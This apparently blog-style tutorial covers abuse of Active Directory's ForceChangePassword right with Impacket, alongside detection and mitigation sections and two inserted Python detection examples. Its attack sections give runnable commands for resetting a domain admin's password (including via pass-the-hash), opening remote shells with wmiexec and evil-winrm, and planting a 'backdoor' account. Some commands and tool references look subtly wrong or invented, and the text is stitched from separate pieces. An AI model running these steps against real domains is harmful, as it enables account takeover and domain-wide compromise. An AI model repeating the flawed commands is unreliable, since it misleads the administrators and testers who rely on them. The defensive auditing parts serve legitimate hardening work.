
Introduction:
Active Directory (AD) misconfigurations are a goldmine for attackers, and the ForceChangePassword delegated permission is one of the most commonly overlooked flaws. By abusing this right with Impacket’s `changepasswd` tool, an attacker can reset any user’s password without knowing the current credentials, leading to immediate account takeover, privilege escalation, and lateral movement across the domain.
Learning Objectives:
- Understand how the ForceChangePassword permission works and why it poses a critical security risk.
- Execute a password change attack using Impacket from a Linux attacker machine.
- Detect the abuse via Windows event logs and implement mitigation strategies to harden AD permissions.
You Should Know:
1. Understanding ForceChangePassword Permission and Its Abuse
This permission is part of Active Directory’s delegated rights model. When an object (user or group) is granted the `ForceChangePassword` extended right on a target user, they can reset that user’s password without providing the old one. Attackers who compromise an account with such delegation can instantly take over any user, especially privileged ones like domain admins.
Step‑by‑step guide to enumerate this weakness:
- On a Windows domain-joined machine (as a low-privilege user), use `dsacls` to check for ForceChangePassword rights (dsacls prints the extended right under its display name, "Reset Password"):
```cmd
dsacls "CN=TargetUser,CN=Users,DC=domain,DC=com" | findstr /C:"Reset Password"
```
- Alternatively, use PowerView (part of PowerSploit); with `-ResolveGUIDs` the right is reported as `User-Force-Change-Password`:
```powershell
Import-Module .\PowerView.ps1
Get-DomainObjectAcl -Identity TargetUser -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match "ExtendedRight" -and $_.ObjectAceType -match "User-Force-Change-Password"}
```
- From Linux, with Impacket's `findDelegation.py` (or bloodhound.py), you can map all users who have this right.
The output will show which principals have the right. If a non‑administrative account appears, it’s a major attack path.
2. Setting Up Impacket Environment for the Attack
Impacket is a collection of Python classes for working with network protocols. The `impacket-changepasswd` script (also named changepasswd.py) is specifically built to abuse the `ForceChangePassword` right over SMB/RPC.
Step‑by‑step installation and configuration:
- On Kali Linux or any Debian-based system:
```shell
sudo apt update && sudo apt install impacket-scripts
```
Or install from source:
```shell
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
sudo python3 setup.py install
```
- Verify installation:
```shell
changepasswd.py -h
```
- Ensure you have network connectivity to the Domain Controller (DC) on ports 445 (SMB) and 135 (RPC). Use `nmap` to check:
```shell
nmap -p 135,445 <DC-IP>
```
- You also need valid credentials for an account that has the ForceChangePassword right (obtained via previous enumeration or phishing). If you have an NTLM hash instead of a clear-text password, Impacket can use pass-the-hash.
3. Performing the Password Change Attack with Impacket
Once you have an account (e.g., lowpriv_user) that can force a change on admin_user, execute the attack.
Step‑by‑step guide:
- Basic command syntax:
```shell
changepasswd.py domain.com/lowpriv_user:password@<DC-IP> -newpass NewP@ssw0rd! -target admin_user
```
- If you have an NTLM hash (pass-the-hash):
```shell
changepasswd.py domain.com/lowpriv_user@<DC-IP> -hashes <LMhash:NThash> -newpass NewP@ssw0rd! -target admin_user
```
- Example output indicating success: `[*] Password changed successfully!`
- Now you can authenticate as `admin_user` using `NewP@ssw0rd!` with any tool (e.g., psexec.py, wmiexec.py, RDP).
- For lateral movement, use wmiexec.py:
```shell
wmiexec.py domain.com/admin_user:NewP@ssw0rd!@<Target-IP>
```
This grants immediate interactive shell access on the remote machine. If the target was a Domain Admin, you have essentially owned the entire domain.
4. Detecting the Attack via Windows Event Logs
Defenders need to recognize when a password change occurs without prior authentication or from unexpected sources.
Step‑by‑step detection guide:
- On the Domain Controller, enable auditing for “User Account Management” (GPO: Computer Configuration → Windows Settings → Security Settings → Advanced Audit Policy → Audit User Account Management).
- Look for Event ID 4724 (An attempt was made to reset an account's password). Key fields to inspect:
  - `Subject Account Name`: the account that performed the reset.
  - `Target Account Name`: the account whose password was reset.
  - `Caller Process Name` and `Workstation Name`: often reveal a remote source (e.g., `\\<Attacker-IP>`).
- Additionally, Event ID 4648 (A logon was attempted using explicit credentials) may precede the reset.
- Use PowerShell to hunt for anomalous resets (`-like` needs wildcards to match inside the message text):
```powershell
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4724} | Where-Object {$_.Message -like "*lowpriv_user*"} | Format-List
```
- SIEM rules should flag password resets performed by non-administrators, especially those followed by immediate logons from the same source IP.
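The correlation logic the detection steps describe, as an added example that is not part of the original post: it walks exported 4724/4648 records, flags resets whose Subject is outside an assumed authorized-resetter set, and notes when a 4648 explicit-credential logon from the same workstation immediately preceded the reset. The event records, the `AUTHORIZED_RESETTERS` and `PRIVILEGED_TARGETS` sets are constructed for the demo; real input would be a Get-WinEvent or SIEM export mapped to the same fields.

```python
from datetime import datetime, timedelta

# Accounts expected to reset other users' passwords (assumption for this demo).
AUTHORIZED_RESETTERS = {"HELPDESK01", "SVC_IDM"}
# Targets whose reset should always be reviewed (assumption for this demo).
PRIVILEGED_TARGETS = {"admin_user", "Administrator"}

# Constructed sample events carrying the 4724/4648 fields named in the text.
EVENTS = [
    {"id": 4648, "time": "2024-05-01T10:00:02", "subject": "lowpriv_user",
     "target": "lowpriv_user", "workstation": "UNMANAGED-HOST"},
    {"id": 4724, "time": "2024-05-01T10:00:05", "subject": "lowpriv_user",
     "target": "admin_user", "workstation": "UNMANAGED-HOST"},
    {"id": 4724, "time": "2024-05-01T11:30:00", "subject": "HELPDESK01",
     "target": "jdoe", "workstation": "HD-WS-07"},
]


def find_suspicious_resets(events, window=timedelta(minutes=5)):
    """Return every 4724 whose Subject is not an authorized resetter, with the
    reasons it was flagged (privileged target, preceding 4648 from same host)."""
    logons = [e for e in events if e["id"] == 4648]
    findings = []
    for r in (e for e in events if e["id"] == 4724):
        if r["subject"] in AUTHORIZED_RESETTERS:
            continue
        reasons = ["reset by non-authorized account"]
        if r["target"] in PRIVILEGED_TARGETS:
            reasons.append("privileged target")
        # Correlate with an explicit-credential logon from the same workstation
        # in the minutes before the reset (the sequence the text describes).
        reset_at = datetime.fromisoformat(r["time"])
        for l in logons:
            delta = reset_at - datetime.fromisoformat(l["time"])
            if l["workstation"] == r["workstation"] and timedelta(0) <= delta <= window:
                reasons.append("preceded by 4648 from same workstation")
                break
        findings.append({"subject": r["subject"], "target": r["target"],
                         "workstation": r["workstation"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_resets(EVENTS):
        print(finding)
```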
5. Mitigation and Hardening AD Permissions
The root cause is overly permissive delegation. Removing unnecessary ForceChangePassword rights is the primary fix.
Step‑by‑step mitigation guide:
- Identify all ForceChangePassword ACEs across the domain using PowerView (with `-ResolveGUIDs` the right is reported as `User-Force-Change-Password`):
```powershell
Get-DomainObjectAcl -ResolveGUIDs | Where-Object {$_.ObjectAceType -match "User-Force-Change-Password"} | Select-Object ObjectDN, ActiveDirectoryRights, SecurityIdentifier
```
- Convert SIDs to names:
```powershell
Convert-SidToName <SID>
```
- For each dangerous ACE, remove the offending trustee's explicit permissions using `dsacls` (run as Domain Admin). `/R` strips every explicit ACE for that trustee on the object, so re-grant anything legitimate afterwards:
```cmd
dsacls "CN=TargetUser,CN=Users,DC=domain,DC=com" /R "DOMAIN\OffendingUser"
```
- Alternatively, use Active Directory Users and Computers (ADUC): open user properties → Security → Advanced → select the offending entry → Edit → uncheck “Change password”.
- Implement the principle of least privilege: delegate only “Reset Password” to helpdesk groups on specific OUs, and never to ordinary users.
- Use AdminSDHolder protection for privileged accounts; consider Protected Users group to prevent NTLM-based attacks.
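Both the enumeration step in section 1 and the first mitigation step above come down to the same triage: which principals hold ForceChangePassword on which objects, and which of them should not. The following added example (not the post's or PowerView's code) performs that triage over a CSV export in the shape of the columns selected above. The rights GUID `00299570-246d-11d0-a768-00aa006e0529` is the schema-defined identifier of User-Force-Change-Password; the CSV rows, the SID-to-name map (standing in for Convert-SidToName) and the `EXPECTED_PRINCIPALS` allow-list are constructed assumptions.

```python
import csv
import io

# Schema GUID of the User-Force-Change-Password extended right.
FORCE_CHANGE_PASSWORD_GUID = "00299570-246d-11d0-a768-00aa006e0529"
ALL_RIGHTS_GUIDS = {"", "00000000-0000-0000-0000-000000000000"}

# Principals for which holding this right is expected (assumption; tune per domain).
EXPECTED_PRINCIPALS = {"DOMAIN\\Domain Admins", "DOMAIN\\Enterprise Admins",
                       "NT AUTHORITY\\SYSTEM", "DOMAIN\\Helpdesk-PwReset"}

# Constructed SID -> name map standing in for Convert-SidToName.
SID_NAMES = {
    "S-1-5-21-1-2-3-512": "DOMAIN\\Domain Admins",
    "S-1-5-21-1-2-3-1105": "DOMAIN\\lowpriv_user",
    "S-1-5-21-1-2-3-1200": "DOMAIN\\Helpdesk-PwReset",
}

# Constructed export with the columns selected from Get-DomainObjectAcl (raw GUIDs).
ACL_CSV = """ObjectDN,ActiveDirectoryRights,ObjectAceType,SecurityIdentifier
"CN=admin_user,CN=Users,DC=domain,DC=com",ExtendedRight,00299570-246d-11d0-a768-00aa006e0529,S-1-5-21-1-2-3-1105
"CN=admin_user,CN=Users,DC=domain,DC=com",ExtendedRight,00299570-246d-11d0-a768-00aa006e0529,S-1-5-21-1-2-3-512
"CN=jdoe,CN=Users,DC=domain,DC=com",ExtendedRight,00299570-246d-11d0-a768-00aa006e0529,S-1-5-21-1-2-3-1200
"CN=jdoe,CN=Users,DC=domain,DC=com",GenericAll,,S-1-5-21-1-2-3-512
"""


def grants_force_change_password(rights, ace_type):
    """True if the ACE confers the reset right directly, via GenericAll, or via
    an ExtendedRight ACE with no object type (which means all extended rights)."""
    if "GenericAll" in rights:
        return True
    if "ExtendedRight" in rights:
        return ace_type.lower() == FORCE_CHANGE_PASSWORD_GUID or ace_type in ALL_RIGHTS_GUIDS
    return False


def find_risky_force_change_password(csv_text):
    """Return (target DN, principal) for every reset-capable ACE whose holder
    is outside EXPECTED_PRINCIPALS; unresolved SIDs are reported as-is."""
    risky = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if not grants_force_change_password(row["ActiveDirectoryRights"], row["ObjectAceType"]):
            continue
        principal = SID_NAMES.get(row["SecurityIdentifier"], row["SecurityIdentifier"])
        if principal not in EXPECTED_PRINCIPALS:
            risky.append((row["ObjectDN"], principal))
    return risky
```

Each tuple returned is a candidate for the `dsacls /R` or ADUC removal step above, after confirming the grant is not a documented delegation.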
6. Advanced Exploitation: Combining with Other Attack Techniques
Attackers rarely stop at a single password change. Combining ForceChangePassword with other misconfigurations amplifies damage.
Step‑by‑step guide for red team simulation:
- After changing a user's password, check if that user has Remote Desktop rights:
```shell
evil-winrm -i <Target-IP> -u admin_user -p NewP@ssw0rd!
```
- Dump credentials from memory using `mimikatz` or `procdump` + `mimikatz` to harvest more hashes.
- Use the new credentials to enumerate further AD delegation (e.g., AdminSDHolder, GPO rights, unconstrained delegation).
- For persistence, add a new user or modify service accounts:
```shell
python3 adduser.py domain.com/admin_user:NewP@ssw0rd!@<DC-IP> -user backdoor -pass Evil123!
```
- Abuse SMB/RPC mismanagement: if the compromised user had `GenericAll` rights on another object, you can perform a resource‑based constrained delegation (RBCD) attack.
7. Using Windows Native Tools for Similar Effect (Without Impacket)
If you are on a Windows attack host (e.g., after gaining initial foothold), you can abuse ForceChangePassword without Impacket.
Step‑by‑step guide using native tools:
- Install AD RSAT tools (if not present):
```powershell
Add-WindowsCapability -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 -Online
```
- Use `Set-ADAccountPassword` (requires the ActiveDirectory module):
```powershell
$newpass = ConvertTo-SecureString "NewP@ssw0rd!" -AsPlainText -Force
Set-ADAccountPassword -Identity admin_user -NewPassword $newpass -Reset
```
- If you have an NTLM hash, first obtain a Kerberos ticket using `runas /netonly` or `sekurlsa::pth` from Mimikatz:
```cmd
runas /netonly /user:domain.com\lowpriv_user cmd
```
- Inside that session, execute the password reset command. This bypasses the need for a clear-text password.
- For enumeration, `net` commands:
```cmd
net user lowpriv_user /domain
```
- Use `adfind` (free tool) to query ACLs:
```cmd
adfind -b "DC=domain,DC=com" -f "(objectClass=user)" -sdnacl -sddlfilter -p "ForceChangePassword" -csv
```
What Undercode Say:
- ForceChangePassword is a critical AD misconfiguration that is often overlooked during security assessments, yet it provides a direct path to privilege escalation without any exploit – it’s a feature abused as a bug.
- Detection requires proactive logging and behavior analytics; simply relying on native Windows auditing may miss the attack if not configured correctly, and defenders should build SIEM rules correlating password resets with unusual source IPs or accounts.
Impacket’s `changepasswd` is a powerful tool for red teams, but also a stark reminder for blue teams to review delegated permissions. The ease of resetting any user’s password – from domain admin to service accounts – means that one compromised low‑privileged helpdesk account can lead to full domain compromise within minutes. Organizations must regularly run tools like BloodHound to visualize attack paths and remediate over‑delegation. Additionally, enabling and monitoring Event ID 4724, restricting NTLM usage, and implementing authentication policies like “Smart Card required for interactive logon” on privileged accounts drastically reduce risk. Remember: AD delegation is an ACL chain – one broken link can hand attackers the keys to the kingdom.
Prediction:
Within the next 12–18 months, we expect to see a surge in ransomware groups weaponizing ForceChangePassword abuses as an initial access vector, especially targeting managed service providers (MSPs) that still use over‑delegated helpdesk accounts. As Microsoft pushes cloud‑native solutions like Azure AD, on‑prem AD misconfigurations will become the “shadow IT” weak spot. AI‑driven attack path management tools will automate enumeration of such rights, forcing defenders to adopt zero‑trust identity protection – including time‑based just‑in‑time (JIT) delegation and mandatory password change approvals via privileged access workstations (PAWs). The cat‑and‑mouse game will shift from exploiting the permission to detecting unnatural reset patterns through UEBA, but for now, manual AD review remains the only reliable safeguard.
Reported By: Shubham Sharmaa – Hackers Feeds